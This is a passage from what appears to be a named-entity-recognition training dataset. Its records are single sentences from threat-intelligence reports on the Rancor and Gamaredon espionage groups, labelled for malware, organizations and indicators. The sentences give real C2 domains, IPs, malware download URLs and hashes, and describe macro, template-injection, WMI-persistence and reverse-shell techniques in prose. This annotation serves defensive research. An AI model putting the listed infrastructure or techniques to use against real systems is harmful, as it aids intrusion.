"aptner_train_000974", "source": "aptner_train"}} {"text": "Rancor : Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia .", "spans": {"Organization: Rancor": [[0, 6]]}, "info": {"id": "aptner_train_000975", "source": "aptner_train"}} {"text": "In late June 2018 , Unit 42 revealed a previously unknown cyber espionage group we dubbed Rancor , which conducted targeted attacks in Southeast Asia throughout 2017 and 2018 .", "spans": {"Organization: Unit 42": [[20, 27]], "Organization: Rancor": [[90, 96]]}, "info": {"id": "aptner_train_000976", "source": "aptner_train"}} {"text": "In recent attacks , the group has persistently targeted at least one government organization in Cambodia from December 2018 through January 2019 .", "spans": {"Organization: government organization in": [[69, 95]]}, "info": {"id": "aptner_train_000977", "source": "aptner_train"}} {"text": "While researching these attacks , we discovered an undocumented , custom malware family – which we ’ve named Dudell .", "spans": {"Malware: Dudell": [[109, 115]]}, "info": {"id": "aptner_train_000978", "source": "aptner_train"}} {"text": "In addition , we discovered the group using Derusbi , which is a malware family believed to be unique to a small subset of Chinese cyber espionage groups .", "spans": {"Malware: Derusbi": [[44, 51]]}, "info": {"id": "aptner_train_000979", "source": "aptner_train"}} {"text": "Between early December 2018 and the end of January 2019 , Rancor conducted at least two rounds of attacks intending to install Derusbi or KHRat malware systems .", "spans": {"Organization: Rancor": [[58, 64]]}, "info": {"id": "aptner_train_000980", "source": "aptner_train"}} {"text": "January 2019 sent via 149.28.156.61 to deliver either Derusbi or KHRat samples with either cswksfwq.kfesv.xyz or connect.bafunpda.xyz as C2 .", "spans": {"Indicator: 149.28.156.61": [[22, 35]], "Malware: Derusbi": [[54, 61]], "Malware: KHRat": [[65, 70]], "Indicator: cswksfwq.kfesv.xyz": [[91, 109]], 
"Indicator: connect.bafunpda.xyz": [[113, 133]], "System: C2": [[137, 139]]}, "info": {"id": "aptner_train_000981", "source": "aptner_train"}} {"text": "DUDELL : SHA256 : 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e .", "spans": {"Malware: DUDELL": [[0, 6]], "Indicator: 0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e": [[18, 82]]}, "info": {"id": "aptner_train_000982", "source": "aptner_train"}} {"text": "DUDELL : File Type :M icrosoft Excel 97 – 2 Document .", "spans": {"Malware: DUDELL": [[0, 6]], "System: :M icrosoft Excel 97": [[19, 39]]}, "info": {"id": "aptner_train_000983", "source": "aptner_train"}} {"text": "DUDELL : File Name :E quipment Purchase List 2018-2020 (Final ).xls .", "spans": {"Malware: DUDELL": [[0, 6]], "Indicator: :E quipment Purchase List 2018-2020 (Final ).xls": [[19, 67]]}, "info": {"id": "aptner_train_000984", "source": "aptner_train"}} {"text": "The DUDELL sample is a weaponized Microsoft Excel document that contains a malicious macro that runs on the victim ’s machine .", "spans": {"Malware: DUDELL": [[4, 10]], "Organization: Microsoft": [[34, 43]], "Organization: Excel": [[44, 49]], "System: malicious macro": [[75, 90]]}, "info": {"id": "aptner_train_000985", "source": "aptner_train"}} {"text": "It shares the same malicious behavior reported by Checkpoint in Rancor : The Year of The Phish SHA-1 c829f5f9ff89210c888c1559bb085ec6e65232de .", "spans": {"Organization: Checkpoint": [[50, 60]], "Organization: Rancor": [[64, 70]], "Malware: The Year of The Phish": [[73, 94]], "Indicator: c829f5f9ff89210c888c1559bb085ec6e65232de": [[101, 141]]}, "info": {"id": "aptner_train_000986", "source": "aptner_train"}} {"text": "In Check Point ’s blog , the sample is from December 2018 while this sample is from April 2018 .", "spans": {"Organization: Check Point": [[3, 14]]}, "info": {"id": "aptner_train_000987", "source": "aptner_train"}} {"text": "The macro in this document gets executed when the user views the 
document and clicks Enable Content , at which point the macro locates and executes the data located under the Company field in the document ’s properties .", "spans": {"System: macro": [[4, 9], [121, 126]]}, "info": {"id": "aptner_train_000988", "source": "aptner_train"}} {"text": "The C2 server 199.247.6.253 is known to be used by the Rancor group .", "spans": {"System: C2": [[4, 6]], "Indicator: 199.247.6.253": [[14, 27]], "Organization: Rancor": [[55, 61]]}, "info": {"id": "aptner_train_000989", "source": "aptner_train"}} {"text": "The script is downloading a second stage payload via the Microsoft tool msiexec .", "spans": {"Organization: Microsoft": [[57, 66]], "System: msiexec": [[72, 79]]}, "info": {"id": "aptner_train_000990", "source": "aptner_train"}} {"text": "Unfortunately at the time of discovery , the hosted file is unavailable .", "spans": {}, "info": {"id": "aptner_train_000991", "source": "aptner_train"}} {"text": "Our systems were able to record the hash of file tmp.vbs , but the contents of the file are no longer available .", "spans": {"Indicator: tmp.vbs": [[49, 56]]}, "info": {"id": "aptner_train_000992", "source": "aptner_train"}} {"text": "Pivoting off the filename and directory , we discovered a similar VBS script used by the Rancor actors that might give us some clues on what the contents of tmp.vbs would resemble .", "spans": {"Organization: Rancor": [[89, 95]], "Indicator: tmp.vbs": [[157, 164]]}, "info": {"id": "aptner_train_000993", "source": "aptner_train"}} {"text": "File office.vbs ( SHA256 : 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2 ) was discovered in directory c:\\Windows\\System32\\spool\\drivers\\color .", "spans": {"Indicator: office.vbs": [[5, 15]], "Indicator: 4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2": [[27, 91]]}, "info": {"id": "aptner_train_000994", "source": "aptner_train"}} {"text": "Hashes for tmp.vbs :b 958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8 .", 
"spans": {"Indicator: tmp.vbs": [[11, 18]], "Indicator: :b 958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8": [[19, 83]]}, "info": {"id": "aptner_train_000995", "source": "aptner_train"}} {"text": "If the file tmp.vbs does in fact contain similar content as that of office.vbs , then it could be another method for downloading payloads onto the target .", "spans": {"Indicator: tmp.vbs": [[12, 19]], "Indicator: office.vbs": [[68, 78]]}, "info": {"id": "aptner_train_000996", "source": "aptner_train"}} {"text": "DDKONG Plugin : SHA256 : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 .", "spans": {"Malware: DDKONG": [[0, 6]], "Indicator: 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707": [[25, 89]]}, "info": {"id": "aptner_train_000997", "source": "aptner_train"}} {"text": "DDKONG Plugin : Compile Date and Time : 2017-02-17 08:33:45 AM .", "spans": {"Malware: DDKONG": [[0, 6]]}, "info": {"id": "aptner_train_000998", "source": "aptner_train"}} {"text": "DDKONG Plugin : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows .", "spans": {"Malware: DDKONG": [[0, 6]], "System: DLL": [[46, 49]], "System: MS Windows": [[69, 79]]}, "info": {"id": "aptner_train_000999", "source": "aptner_train"}} {"text": "DDKONG Plugin : File Name : H istory.nls .", "spans": {"Malware: DDKONG": [[0, 6]], "Indicator: H istory.nls": [[28, 40]]}, "info": {"id": "aptner_train_001000", "source": "aptner_train"}} {"text": "The DllInstall export function is responsible for the core behavior of the malware , as just loading it does nothing .", "spans": {"Malware: DllInstall": [[4, 14]]}, "info": {"id": "aptner_train_001001", "source": "aptner_train"}} {"text": "Once this export is called , it checks for a hidden window with a caption of Hello Google !", "spans": {}, "info": {"id": "aptner_train_001002", "source": "aptner_train"}} {"text": ".", "spans": {}, "info": {"id": "aptner_train_001003", "source": "aptner_train"}} {"text": "This check is 
performed to ensure that only one instance of the malware is running at a time .", "spans": {}, "info": {"id": "aptner_train_001004", "source": "aptner_train"}} {"text": "The hidden window created by the malware filters on any user input ( e.g . keyboard or mouse activity ) .", "spans": {}, "info": {"id": "aptner_train_001005", "source": "aptner_train"}} {"text": "This could be an attempt to evade sandbox analysis as mouse and keyboard movement is typically not performed .", "spans": {}, "info": {"id": "aptner_train_001006", "source": "aptner_train"}} {"text": "The malware then proceeds to beacon to a configured remote server of cswksfwq.kfesv.xyz on TCP port 8080 .", "spans": {"Indicator: cswksfwq.kfesv.xyz": [[69, 87]]}, "info": {"id": "aptner_train_001007", "source": "aptner_train"}} {"text": "Upon successful connection , the malware transmits victim information such as : hostname , IP address , Language Pack along with other operating system information .", "spans": {}, "info": {"id": "aptner_train_001008", "source": "aptner_train"}} {"text": "The data transmitted are XOR encoded .", "spans": {}, "info": {"id": "aptner_train_001009", "source": "aptner_train"}} {"text": "The malware supports the following capabilities : Terminate specific process、Enumerate processes、Upload file、Download file、Delete file、List folder contents、Enumerate storage volumes、Execute a command、Reverse shell、Take a screenshot .", "spans": {}, "info": {"id": "aptner_train_001010", "source": "aptner_train"}} {"text": "KHRAT : SHA256 : aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380 .", "spans": {"Malware: KHRAT": [[0, 5]], "Indicator: aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380": [[17, 76]]}, "info": {"id": "aptner_train_001011", "source": "aptner_train"}} {"text": "KHRAT : Compile Date and Time : 2018-05-02 05:22:23 PM .", "spans": {"Malware: KHRAT": [[0, 5]]}, "info": {"id": "aptner_train_001012", "source": "aptner_train"}} {"text": "KHRAT : File Type : PE32 
executable ( DLL ) Intel 80386, for MS Windows .", "spans": {"Malware: KHRAT": [[0, 5]], "System: DLL": [[38, 41]], "System: MS Windows": [[61, 71]]}, "info": {"id": "aptner_train_001013", "source": "aptner_train"}} {"text": "KHRAT : File Name : 8081.dll .", "spans": {"Malware: KHRAT": [[0, 5]], "Indicator: 8081.dll": [[20, 28]]}, "info": {"id": "aptner_train_001014", "source": "aptner_train"}} {"text": "Rmcmd :", "spans": {}, "info": {"id": "aptner_train_001015", "source": "aptner_train"}} {"text": "When the DLL is initially loaded , it dynamically resolves and imports additional modules ( DLLs ’ ) needed .", "spans": {"System: DLL": [[9, 12]], "System: DLLs": [[92, 96]]}, "info": {"id": "aptner_train_001016", "source": "aptner_train"}} {"text": "Once loaded and the export entry of Rmcmd is called , it creates a Windows mutex named gkdflbmdfk .", "spans": {"System: Windows mutex": [[67, 80]], "System: gkdflbmdfk": [[87, 97]]}, "info": {"id": "aptner_train_001017", "source": "aptner_train"}} {"text": "This ensures that only one copy of the malware is running at a time .", "spans": {}, "info": {"id": "aptner_train_001018", "source": "aptner_train"}} {"text": "It then begins to beacon to a configured domain of connect.bafunpda.xyz on TCP port 8081 .", "spans": {"Indicator: connect.bafunpda.xyz": [[51, 71]]}, "info": {"id": "aptner_train_001019", "source": "aptner_train"}} {"text": "The malware collects and transmits data from the host , such as hostname and is XOR encoded with the first byte of the network traffic being the key .", "spans": {}, "info": {"id": "aptner_train_001020", "source": "aptner_train"}} {"text": "Reverse Shell :", "spans": {"System: Reverse Shell": [[0, 13]]}, "info": {"id": "aptner_train_001021", "source": "aptner_train"}} {"text": "The malware behavior and code share similarities with an older KHRAT sample from May 2018 .", "spans": {"Malware: KHRAT": [[63, 68]]}, "info": {"id": "aptner_train_001022", "source": "aptner_train"}} {"text": 
"Sample ( SHA256 : bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659 ) has the same export entry name and is also a reverse shell .", "spans": {"Indicator: bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659": [[18, 82]], "System: reverse shell": [[130, 143]]}, "info": {"id": "aptner_train_001023", "source": "aptner_train"}} {"text": "The newer sample appears to be a re-write for optimization purposes with the underlying behavior remaining the same , reverse shell .", "spans": {"System: reverse shell": [[118, 131]]}, "info": {"id": "aptner_train_001024", "source": "aptner_train"}} {"text": "Derusbi : SHA256 : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab .", "spans": {"Malware: Derusbi": [[0, 7]], "Indicator: 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab": [[19, 78]]}, "info": {"id": "aptner_train_001025", "source": "aptner_train"}} {"text": "Derusbi : Compile Date and Time : 2012-09-14 09:20:12 AM .", "spans": {"Malware: Derusbi": [[0, 7]]}, "info": {"id": "aptner_train_001026", "source": "aptner_train"}} {"text": "Derusbi : File Type :P E32 executable ( DLL ) Intel 80386, for MS Windows .", "spans": {"Malware: Derusbi": [[0, 7]], "System: DLL": [[40, 43]], "System: MS Windows": [[63, 73]]}, "info": {"id": "aptner_train_001027", "source": "aptner_train"}} {"text": "Derusbi : File Name : 32.dll .", "spans": {"Malware: Derusbi": [[0, 7]], "Indicator: 32.dll": [[22, 28]]}, "info": {"id": "aptner_train_001028", "source": "aptner_train"}} {"text": "Derusbi is a backdoor Trojan believed to be used among a small group of attackers , which includes the Rancor group .", "spans": {"Malware: Derusbi": [[0, 7]], "Malware: backdoor Trojan": [[13, 28]], "Organization: Rancor": [[103, 109]]}, "info": {"id": "aptner_train_001029", "source": "aptner_train"}} {"text": "This particular sample is a loader that loads an encrypted payload for its functionality .", "spans": {}, "info": {"id": "aptner_train_001030", "source": 
"aptner_train"}} {"text": "This DLL requires the loading executable to include a 32-byte key on the command line to be able to decrypt the embedded payload , which unfortunately we do not have .", "spans": {"System: DLL": [[5, 8]]}, "info": {"id": "aptner_train_001031", "source": "aptner_train"}} {"text": "Even though we don’t have the decryption key or loader , we have uncovered some interesting artifacts .", "spans": {}, "info": {"id": "aptner_train_001032", "source": "aptner_train"}} {"text": "If the module that loads the sample is named myapp.exe the module will exit Once loaded , it sleeps for six seconds .", "spans": {"Indicator: myapp.exe": [[45, 54]]}, "info": {"id": "aptner_train_001033", "source": "aptner_train"}} {"text": "Looks for a Windows pipe named \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll .", "spans": {"System: Windows": [[12, 19]], "Indicator: \\\\.\\pipe\\_kernel32.dll.ntdll.dll.user32.dll": [[31, 74]]}, "info": {"id": "aptner_train_001034", "source": "aptner_train"}} {"text": "Looks for a Windows device named \\Device\\acpi_010221 . 
n July 2019 , we discovered an interesting VBScript named Chrome.vbs ( SHA256 : 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2 ) associated with the Rancor group .", "spans": {"System: Windows": [[12, 19]], "System: VBScript": [[98, 106]], "Indicator: Chrome.vbs": [[113, 123]], "Indicator: 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2": [[135, 199]], "Organization: Rancor": [[222, 228]]}, "info": {"id": "aptner_train_001035", "source": "aptner_train"}} {"text": "This particular VBScript payload beacons to domain bafunpda.xyz , which is also used by the KHRAT Trojan listed above in Table 2 .", "spans": {"System: VBScript": [[16, 24]], "Indicator: bafunpda.xyz": [[51, 63]], "Malware: KHRAT": [[92, 97]]}, "info": {"id": "aptner_train_001036", "source": "aptner_train"}} {"text": "This VBScript is obfuscated and contains packed data that is used to infect a target with multiple chained persistent artifacts .", "spans": {"System: VBScript": [[5, 13]]}, "info": {"id": "aptner_train_001037", "source": "aptner_train"}} {"text": "The MOF file created by the VBScript is used as a persistence mechanism via Windows Management Instrumentation ( WMI ) Event Subscriptions .", "spans": {"System: MOF file": [[4, 12]], "System: VBScript": [[28, 36]], "System: Windows Management Instrumentation": [[76, 110]], "System: WMI": [[113, 116]]}, "info": {"id": "aptner_train_001038", "source": "aptner_train"}} {"text": "MOF files are compiled scripts that describe Common Information Model ( CIM ) classes , which are compiled into the WMI repository .", "spans": {"System: MOF files": [[0, 9]], "System: Common Information Model": [[45, 69]], "System: CIM": [[72, 75]], "System: WMI": [[116, 119]]}, "info": {"id": "aptner_train_001039", "source": "aptner_train"}} {"text": "The technique is described by MITRE ATT&CK IDT1084 .", "spans": {"Organization: MITRE": [[30, 35]]}, "info": {"id": "aptner_train_001040", "source": "aptner_train"}} {"text": "This 
particular MOF file creates a timer event that is triggered every five seconds .", "spans": {"System: MOF file": [[16, 24]]}, "info": {"id": "aptner_train_001041", "source": "aptner_train"}} {"text": "The DLL located in the Media registry key is a variant of the KHRAT Troja .", "spans": {"System: DLL": [[4, 7]], "System: Media registry": [[23, 37]], "Malware: KHRAT": [[62, 67]], "Malware: Troja": [[68, 73]]}, "info": {"id": "aptner_train_001042", "source": "aptner_train"}} {"text": "It beacons to domain connect.bafunpda.xyz and attempts to connect to TCP port 4433 .", "spans": {"Indicator: connect.bafunpda.xyz": [[21, 41]]}, "info": {"id": "aptner_train_001043", "source": "aptner_train"}} {"text": "This is the same domain used by the KHRAT Trojan .", "spans": {"Malware: KHRAT": [[36, 41]]}, "info": {"id": "aptner_train_001044", "source": "aptner_train"}} {"text": "Rancor , a cyber espionage group active since at least 2017 , continues to conduct targeted attacks in Southeast Asia and has been found using an undocumented , custom malware family – which we ’ve dubbed Dudell – to download a second stage payload once its malicious macro is executed .", "spans": {"Organization: Rancor": [[0, 6]], "Malware: Dudell": [[205, 211]]}, "info": {"id": "aptner_train_001045", "source": "aptner_train"}} {"text": "Additionally , Rancor is also using the Derusbi malware family to load a secondary payload once it infiltrates a target .", "spans": {"Organization: Rancor": [[15, 21]], "Malware: Derusbi": [[40, 47]]}, "info": {"id": "aptner_train_001046", "source": "aptner_train"}} {"text": "Rancor : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707": [[9, 73]]}, "info": {"id": "aptner_train_001047", "source": "aptner_train"}} {"text": "Rancor : AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609 .", "spans": {"Organization: Rancor": 
[[0, 6]], "Indicator: AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609": [[9, 73]]}, "info": {"id": "aptner_train_001048", "source": "aptner_train"}} {"text": "Rancor : 0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: 0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E": [[9, 73]]}, "info": {"id": "aptner_train_001049", "source": "aptner_train"}} {"text": "Rancor : DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E": [[9, 73]]}, "info": {"id": "aptner_train_001050", "source": "aptner_train"}} {"text": "Rancor : CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A": [[9, 73]]}, "info": {"id": "aptner_train_001051", "source": "aptner_train"}} {"text": "Rancor : BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659 .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659": [[9, 73]]}, "info": {"id": "aptner_train_001052", "source": "aptner_train"}} {"text": "Rancor : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d": [[9, 73]]}, "info": {"id": "aptner_train_001053", "source": "aptner_train"}} {"text": "Rancor : cswksfwq.kfesv.xyz .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: cswksfwq.kfesv.xyz": [[9, 27]]}, "info": {"id": "aptner_train_001054", "source": "aptner_train"}} {"text": "Rancor : Connect.bafunpda.xyz .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: Connect.bafunpda.xyz": [[9, 29]]}, "info": {"id": "aptner_train_001055", "source": 
"aptner_train"}} {"text": "Rancor : 199.247.6.253 .", "spans": {"Organization: Rancor": [[0, 6]], "Indicator: 199.247.6.253": [[9, 22]]}, "info": {"id": "aptner_train_001056", "source": "aptner_train"}} {"text": "Cyberwarfare : A deep dive into the latest Gamaredon Espionage Campaign .", "spans": {"Organization: Gamaredon": [[43, 52]]}, "info": {"id": "aptner_train_001057", "source": "aptner_train"}} {"text": "Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB ( Federal Security Service ) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power .", "spans": {"Organization: Gamaredon": [[0, 9]], "Organization: Russians FSB": [[72, 84]], "Organization: Federal Security Service": [[87, 111]], "Organization: Ukrainian government": [[182, 202]]}, "info": {"id": "aptner_train_001058", "source": "aptner_train"}} {"text": "Gamaredon has been active since 2014 , and during this time , the modus operandi has remained almost the same .", "spans": {"Organization: Gamaredon": [[0, 9]]}, "info": {"id": "aptner_train_001059", "source": "aptner_train"}} {"text": "The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintaining access on compromised machines .", "spans": {"Malware: Pteranodon": [[40, 50]], "Malware: Pterodo": [[54, 61]], "Malware: backdoor": [[91, 99]]}, "info": {"id": "aptner_train_001060", "source": "aptner_train"}} {"text": "It is distributed in a spear phishing campaign with a weaponized office document that appears to be designed to lure military personnel .", "spans": {"System: office": [[65, 70]]}, "info": {"id": "aptner_train_001061", "source": "aptner_train"}} {"text": "In the recent months , Ukrainian CERT ( CERT-UA ) reported an intensification of Gamaredon Cyberattacks against military targets .", "spans": {"Organization: Ukrainian CERT": 
[[23, 37]], "Organization: CERT-UA": [[40, 47]]}, "info": {"id": "aptner_train_001062", "source": "aptner_train"}} {"text": "The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez .", "spans": {}, "info": {"id": "aptner_train_001063", "source": "aptner_train"}} {"text": "Starting from those findings , Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant .", "spans": {"Organization: Cybaze-Yoroi ZLab team": [[30, 52]], "Malware: Pterodo": [[114, 121]]}, "info": {"id": "aptner_train_001064", "source": "aptner_train"}} {"text": "The complex infection chain begins with a weaponized Office document named “ f.doc ” .", "spans": {"System: Office": [[53, 58]], "Indicator: f.doc": [[76, 81]]}, "info": {"id": "aptner_train_001065", "source": "aptner_train"}} {"text": "Hash : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a", "spans": {"Indicator: 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a": [[7, 71]]}, "info": {"id": "aptner_train_001066", "source": "aptner_train"}} {"text": "Threat : Gamaredon Pteranodon weaponized document .", "spans": {"Organization: Gamaredon": [[9, 18]], "Malware: Pteranodon": [[19, 29]]}, "info": {"id": "aptner_train_001067", "source": "aptner_train"}} {"text": "Brief Description : Doc file weaponized with Exploit .", "spans": {}, "info": {"id": "aptner_train_001068", "source": "aptner_train"}} {"text": "Ssdeep : 768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir : uG1aKQ5OwCrItq3TgGfLt9r .", "spans": {"System: Ssdeep": [[0, 6]]}, "info": {"id": "aptner_train_001069", "source": "aptner_train"}} {"text": "The decoy document is written using the ukrainian language mixed to many special chars aimed to lure the target to click on it .", "spans": {}, "info": {"id": "aptner_train_001070", "source": "aptner_train"}} {"text": "The document leverages the common exploit aka template injection and tries to download a second stage from “ 
http://win-apu.ddns.net/apu.dot ” .", "spans": {"Indicator: http://win-apu.ddns.net/apu.dot": [[109, 140]]}, "info": {"id": "aptner_train_001071", "source": "aptner_train"}} {"text": "Thanks to this  exploit ( Remote Code Execution exploit ) the user interaction is not required , in fact the “ enable macro ” button is not shown .", "spans": {"Vulnerability: Remote Code Execution": [[26, 47]], "System: macro": [[118, 123]]}, "info": {"id": "aptner_train_001072", "source": "aptner_train"}} {"text": "The downloaded document has a “ .dot ” extension , used by Microsoft Office to save templates for different documents with similar formats .", "spans": {"Indicator: .dot": [[32, 36]], "System: Microsoft Office": [[59, 74]]}, "info": {"id": "aptner_train_001073", "source": "aptner_train"}} {"text": "Basic Information on the “ .dot ” file are provided :", "spans": {"Indicator: .dot": [[27, 31]]}, "info": {"id": "aptner_train_001074", "source": "aptner_train"}} {"text": "Hash : e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 .", "spans": {"Indicator: e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8": [[7, 71]]}, "info": {"id": "aptner_train_001075", "source": "aptner_train"}} {"text": "Threat : Gamaredon Pteranodon loader dot file .", "spans": {"Organization: Gamaredon": [[9, 18]], "Malware: Pteranodon": [[19, 29]]}, "info": {"id": "aptner_train_001076", "source": "aptner_train"}} {"text": "Brief Description : Dot file enabling the infection of the Gamaredon Pteranodon .", "spans": {"Organization: Gamaredon": [[58, 67]], "Malware: Pteranodon": [[68, 78]]}, "info": {"id": "aptner_train_001077", "source": "aptner_train"}} {"text": "Ssdeep : 768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ : oI8XoWruHpp/P4 .", "spans": {"System: Ssdeep": [[0, 6]]}, "info": {"id": "aptner_train_001078", "source": "aptner_train"}} {"text": "If we decide to open the document , we see that the document is empty , but it requires the enabling of the macro .", "spans": {"System: 
macro": [[108, 113]]}, "info": {"id": "aptner_train_001079", "source": "aptner_train"}} {"text": "The body of the macro can be logically divided into two distinct parts :", "spans": {"System: macro": [[16, 21]]}, "info": {"id": "aptner_train_001080", "source": "aptner_train"}} {"text": "The first one is the setting of the registry key “ HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\ ” & Application.Version & _ ” \\Word\\Security\\ ” and the declaration of some other variables , such as the dropurl “ geticons.ddns.net ” .", "spans": {}, "info": {"id": "aptner_train_001081", "source": "aptner_train"}} {"text": "The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name “ templates.vbs ” .", "spans": {"Indicator: templates.vbs": [[129, 142]]}, "info": {"id": "aptner_train_001082", "source": "aptner_train"}} {"text": "This vbs is properly the macro executed by the macro engine of word .", "spans": {}, "info": {"id": "aptner_train_001083", "source": "aptner_train"}} {"text": "Analyzing the content of “ templates.vbs ” it is possible to notice that it define a variable containing a URL like “ http://geticons.ddns.net/ADMIN-PC_E42CAF54//autoindex . ]php ” obtained from “ hxp://get-icons.ddns . ]net/ ” & NlnQCJG & “ _ ” & uRDEJCn & “ //autoindex . ]php ” , where “ NlnQCJG ” is the name that identifies the computer on the network and “ uRDEJCn ” is the serial number of drive in hexadecimal encoding .", "spans": {"Indicator: templates.vbs": [[27, 40]], "Indicator: http://geticons.ddns.net/ADMIN-PC_E42CAF54//autoindex .": [[117, 172]], "Indicator: hxp://get-icons.ddns . ]net/ ” & NlnQCJG & “ _ ” & uRDEJCn & “ //autoindex . 
]php": [[196, 277]]}, "info": {"id": "aptner_train_001084", "source": "aptner_train"}} {"text": "From this URL it tries to download another stage then storing it into “ C:\\Users\\admin\\AppData\\Roaming\\ ” path with random name .", "spans": {}, "info": {"id": "aptner_train_001085", "source": "aptner_train"}} {"text": "At the end , “ templates.vbs ” script will force the machine to reboot .", "spans": {"Indicator: templates.vbs": [[15, 28]]}, "info": {"id": "aptner_train_001086", "source": "aptner_train"}} {"text": "The dropped sample is an SFX archive , like the tradition of Gamaredon implants .", "spans": {"System: SFX archive": [[25, 36]], "Organization: Gamaredon": [[61, 70]]}, "info": {"id": "aptner_train_001087", "source": "aptner_train"}} {"text": "Hash : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f .", "spans": {"Indicator: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f": [[7, 71]]}, "info": {"id": "aptner_train_001088", "source": "aptner_train"}} {"text": "Threat : Gamaredon Pteranodon implant SFX archive .", "spans": {"Organization: Gamaredon": [[9, 18]], "Malware: Pteranodon": [[19, 29]], "System: SFX archive": [[38, 49]]}, "info": {"id": "aptner_train_001089", "source": "aptner_train"}} {"text": "Brief Description : SFX Archive First Stage .", "spans": {}, "info": {"id": "aptner_train_001090", "source": "aptner_train"}} {"text": "Ssdeep : 24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv : zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv .", "spans": {"System: Ssdeep": [[0, 6]]}, "info": {"id": "aptner_train_001091", "source": "aptner_train"}} {"text": "By simply opening the SFX archive , it is possible to notice two different files that are shown below and named respectively “ 8957.cmd ” and “ 28847 ” .", "spans": {"System: SFX archive": [[22, 33]], "Indicator: 8957.cmd": [[126, 134]], "Indicator: 28847": [[143, 148]]}, "info": {"id": "aptner_train_001092", "source": "aptner_train"}} {"text": "When executed , the SFX archive 
will be extracted and the “ 8957.cmd ” will be run .", "spans": {"System: SFX archive": [[20, 31]], "Indicator: 8957.cmd": [[60, 68]]}, "info": {"id": "aptner_train_001093", "source": "aptner_train"}} {"text": "At this point , the batch script renames the “ 28847 ” file in “ 28847.exe ” , opens it using “ pfljk ,fkbcerbgblfhs ” as password and the file contained inside the “ 28847.exe ” file will be renamed in “ WuaucltIC.exe ” .", "spans": {"Indicator: 28847": [[47, 52]], "Indicator: 28847.exe": [[64, 73], [164, 173]], "Indicator: WuaucltIC.exe": [[201, 214]]}, "info": {"id": "aptner_train_001094", "source": "aptner_train"}} {"text": "Finally , it will be run using “ post.php ” as argument .", "spans": {"Indicator: post.php": [[33, 41]]}, "info": {"id": "aptner_train_001095", "source": "aptner_train"}} {"text": "The fact that the “ 28847.exe ” file can be opened makes us understand that  the “ 28847 ” file is another SFX file .", "spans": {"Indicator: 28847.exe": [[20, 29]], "Indicator: 28847": [[82, 87]], "System: SFX": [[105, 108]]}, "info": {"id": "aptner_train_001096", "source": "aptner_train"}} {"text": 